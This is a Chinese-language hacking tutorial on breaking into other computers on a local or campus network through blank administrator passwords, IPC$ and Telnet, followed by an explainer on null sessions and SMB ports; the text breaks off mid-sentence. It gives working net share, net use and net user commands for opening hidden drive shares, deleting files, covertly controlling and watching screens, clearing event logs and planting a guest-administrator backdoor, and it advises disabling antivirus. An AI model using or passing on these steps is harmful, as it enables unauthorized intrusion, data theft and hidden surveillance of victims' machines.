很简单的入侵局域网电脑.doc

很简单的入侵局域网电脑非常简单的方法入侵局域网其它电脑 如何入侵局域网电脑 1.入侵的范围只包括局域网，如果在学校上，可以入侵整个校园网； 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空)，并且开了139端口，但没开防火墙的机子。 入侵工具： 一般要用到三个：NTscan变态扫描器，Recton-D贺免杀专用版，DameWare迷你中文版 4.5. （前两个工具杀毒软件都会报毒，建议将杀毒软件实时防毒暂时关掉，并将这两个软件的压缩包加密，防止被杀。） 入侵步骤： 1.使用NTscan变态扫描器，在IP处填上要扫描的IP范围，选择WMI扫描方式，按开始后就等扫描结果了。 2.使用Recton-D贺免杀专用版 选择CMD命令项，在CMD:中输入net share C$=C:，即可开启远程主机的C盘共享，以此将C换成D,E,F等，即可开启D盘，E盘，F盘等的共享，这种共享方式隐蔽性很高，而且是完全共享，在对方主机上不会出现一只手托住盘的共享标志，然后在地址栏中输入对方IPC$，即可进入对方C盘。 选择Telnet项，在远程主机中输入刚才扫描到的一个IP，远程启动Telnet服务，成功后在CMD选项中，执行命令：net share ipc$,接着执行：net share admin$,最后执行net use url=file:/*.*.*.*IPC$*.*.*.*IPC$/url /user：administrator在*处填入你入侵的主机IP。 3.使用DameWare迷你中文版 4.5，安装后点DameWare Mini Remote Control，在帮助项中选择激活产品，输入注册信息，成功注册后，进入远程连接窗口，在主机处填入IP地址，点设置，在服务安装选项中点编辑后,在通知对话框中去掉连接时通知,在附加设置中全都不选，在用户选项中去掉启用用户选项菜单。设置完成好后，就可点连接，在弹出的对话框中点确定后，成功后你就可以像操作自己机子一样控制别人电脑了，当然你也可以只选择监视对方屏幕。 注意：如果不注册的话，在对方主机上会弹出一个对话框，暴露你的身份。 入侵步骤补充： 1.在以上第2步中，远程启动Telnet服务可以通过我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动完成。 2.Recton-D贺免杀专用版还有其他功能，在进程项中，可以查看远程主机的进程，并可任意结束其中进程；在共享项中，可以创建共享，我常用的是创建C$,D$,E$,F$,共享路径分别对应C：,D：等，共享好后在地址栏中输入url=file:/IPC$IPC$/url,进入对方C盘，你就可以随意复制删除里面的东西了，而且这种共享对方机子盘符上不会显示共享图标，也就不会被发现，弄完后最好还是把共享给关掉。最后选日志，清除所有日志，不留痕迹。这个软件会被杀毒软件当作病毒杀掉，用它时须将实时防毒关掉。 3.上面的共享可通过CMD(程序-附件-命令提示符)完成，首先telnet IP,telnet上去,键入y后输入的用户名administrator,密码为空, 进入后，开共享用net share命令，共享C$(即C盘)：net share C$=C：,共享system文件夹：net share c=c：winntsystem32,共享IPC$用：net share IPC$等,最后是关闭共享，关闭C盘共享：net share C$ /del。 4.为方便下次入侵，可以设置后门， 查看用户：net user,激活guest用户 net user guest /active：yes,更改guest的密码为poco：net user guest poco,把guest的权限提升为管理员权限：net localgroup administrators guest /add。 5.telnet命令(DOS命令)很多，可去网上查找它的命令，常用的有：查看D盘文件：dir d：,查看C盘program file文件夹：dir c：PROGRA1;,60秒倒记时关机：shutdown -s -t 60 补充说明： 1.net use错误原因解决： (1).发生系统错误 1326。 登录失败： 未知的用户名或错误密码。 在远程机的控制面板-文件夹选项-查看-简单的文件共享,去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest连接，是无法访问C$等管理共享的. (2)发生系统错误 1327。 登陆失败：用户帐户限制。可能的原因包括不允许空密码，登陆时间限制，或强制的策略限。在远程机的控制面板管理工具本地安全策略安全选项用户权限指派里，禁用空密码用户只能进行控制台登陆. (3)/IP/c$时提示找不到网络途径。在网络和拨号连接中本地连接中选取Internet协议(TCP/IP)属性，进入高级TCP/IP设置选WINS设置里面有一项启用TCP/IP的NETBIOS 关于ipc注意：本文所讨论的各种情况均默认发生在win NT/2000环境下，win98将不在此次讨论之列。 二 什么是ipc$ IPC$(Internet Process Connection)是共享命名管道的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享(c$,d$,e$)和系统目录winnt或windows(admin$)共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。 平时我们总能听到有人在说ipc$漏洞，ipc$漏洞，其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说，一定是指微软自己安置的那个后门：空会话（Null session）。那么什么是空会话呢？ 三 什么是空会话 在介绍空会话之前，我们有必要了解一下一个安全会话是如何建立的。 在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的，建立成功的会话将成为一个安全隧道，建立双方通过它互通信息，这个过程的大致顺序如下： 1）会话请求者（客户）向会话接收者（服务器）传送一个数据包，请求安全隧道的建 立； 2）服务器产生一个随机的64位数（实现挑战）传送回客户； 3）客户取得这个由服务器产生的64位数，用试图建立会话的帐号的口令打乱它，将结 果返回到服务器（实现响应）； 4）服务器接受响应后发送给本地安全验证（LSA），LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号，核实本地发生；如果请求的帐号是一个域的帐号，响应传送到域控制器去核实。当对挑战的响应核实为正确后，一个访问令牌产生，然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。 以上是一个安全会话建立的大致过程，那么空会话又如何呢？ 空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码），但根据WIN2000的访问控制模型，空会话的建立同样需要提供一个令牌，可是空会话在建立过程中并没有经过用户信息的认证，所以这个令牌中不包含用户信息，因此，这个会话不能让系统间发送加密信息，但这并不表示空会话的令牌中不包含安全标识符SID（它标识了用户和所属组），对于一个空会话，LSA提供的令牌的SID是S-1-5-7，这就是空会话的SID，用户名是：ANONYMOUS LOGON（这个用户名是可以在用户列表中看到的，但是是不能在SAM数据库中找到，属于系统内置的帐号），这个访问令牌包含下面伪装的组： Everyone Network 在安全策略的限制下，这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢？ 四 空会话可以做什么 对于NT，在默认安全设置下，借助空连接可以列举目标主机上的用户和共享，访问everyone权限的共享，访问小部分注册表等，并没有什么太大的利用价值；对2000作用更小，因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表，而且实现起来也不方便，需借助工具。 从这些我们可以看到，这种非信任会话并没有多大的用处，但从一次完整的ipc$入侵来看，空会话是一个不可缺少的跳板，因为我们从它那里可以得到户列表，而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的，成功的导出用户列表大大增加了猜解的成功率，仅从这一点，足以说明空会话所带来的安全隐患，因此说空会话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令： 1 首先，我们先建立一个空连接（当然，这需要目标开放ipc$） 命令：net use url=file:/ipipc$ipipc$/url /user: 注意：上面的命令包括四个空格，net与use中间有一个空格，use后面一个，密码左右各一个空格。 2 查看远程主机的共享资源 命令：net view url=file:/ipip/url 解释：前提是建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下面的结果，但此命令不能显示默认共享。 在 *.*.*.*的共享资源 资源共享名 类型 用途 注释 - NETLOGON Disk Logon server share SYSVOL Disk Logon server share 命令成功完成。 3 查看远程主机的当前时间 命令： net time url=file:/ipip/url 解释：用此命令可以得到一个远程主机的当前时间。 4 得到远程主机的NetBIOS用户名列表（需要打开自己的NBT） 命令：nbtstat -A ip 用此命令可以得到一个远程主机的NetBIOS用户名列表，返回如下结果： Node IpAddress: *.*.*.* Scope Id: NetBIOS Remote Machine Name Table Name Type Status - SERVER UNIQUE Registered OYAMANISHI-H GROUP Registered OYAMANISHI-H GROUP Registered SERVER UNIQUE Registered OYAMANISHI-H UNIQUE Registered OYAMANISHI-H GROUP Registered SERVER UNIQUE Registered OYAMANISHI-H UNIQUE Registered ._MSBROWSE_. GROUP Registered INetServices GROUP Registered ISSERVER. UNIQUE Registered MAC Address = 00-50-8B-9A-2D-37 以上就是我们经常使用空会话做的事情，好像也能获得不少东西哟，不过要注意一点：建立IPC$连接的操作会在Event Log中留下记录，不管你是否登录成功。 好了，那么下面我们就来看看ipc$所使用的端口是什么？ 五 ipc$所使用的端口 首先我们来了解一些基础知识： 1 SMB:(Server Message Block) Windows协议族，用于文件打印共享的服务； 2 NBT:(NETBios Over TCP/IP)使用137（UDP）138（UDP）139（TCP）端口实现基于TCP/IP协议的NETBIOS网络互联。 3 在WindowsNT中SMB基于NBT实现，即使用139（TCP）端口；而在Windows2000中，SMB除了基于NBT实现，还可以直接通过445端口实现。 有了这些基础知识，我们就可以进一步来讨论访问网络共享对端口的选择了： 对于win2000客户端（发起端）来说： 1 如果在允许NBT的情况下连接服务器时，客户端会同时尝试访问139和445端口，如果445端口有响应，那么就发送RST包给139端口断开连接，用455端口进行会话，当445端口无响应时，才使用139端口，如果两个端口都没有响应，则会话失败； 2 如果在禁止NBT的情况下连接服务器时，那么客户端只会尝试访问445端口，如果445端口无响应，那么会话失败。 对于win2000服务器端来说： 1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放（LISTENING）； 2 如果禁止NBT，那么只有445端口开放。 我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见，如果远程服务器没有监听139或445端口，ipc$会话是无法建立的。 六 ipc管道在hack攻击中的意义 ipc管道本来是微软为了方便管理员进行远程管理而设计的，但在入侵者看来，开放ipc管道的主机似乎更容易得手。通过ipc管道，我们可以远程调用一些系统函数（大多通过工具实现，但需要相应的权限），这往往是入侵成败的关键。如果不考虑这些，仅从传送文件这一方面，ipc管道已经给了入侵者莫大的支持，甚至已经成为了最重要的传输手段，因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。当然，我们也不能忽视权限在ipc管道中扮演的重要角色，想必你一定品尝过空会话的尴尬，没有权限，开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限，那么ipc管道这把双刃剑将显示出它狰狞的一面。 七 ipc$连接失败的常见原因 以下是一些常见的导致ipc$连接失败的原因： 1 IPC连接是Windows NT及以上系统中特有的功能，由于其需要用到Windows NT中很多DLL函数，所以不能在Windows 9.x/Me系统中运行，也就是说只有nt/2000/xp才可以相互建立ipc$连接，98/me是不能建立ipc$连接的； 2 如果想成功的建立一个ipc$连接，就需要响应方开启ipc$共享，即使是空连接也是这样，如果响应方关闭了ipc$共享，将不能建立连接； 3 连接发起方未启动Lanmanworkstation服务（显示名为：Workstation）：它提供网络链结和通讯，没有它发起方无法发起连接请求； 4 响应方未启动Lanmanserver服务（显示名为：Server）：它提供了 RPC 支持、文件、打印以及命名管道共享，ipc$依赖于此服务，没有它主机将无法响应发起方的连接请求，不过没有它仍可发起ipc$连接； 5 响应方未启动NetLogon，它支持网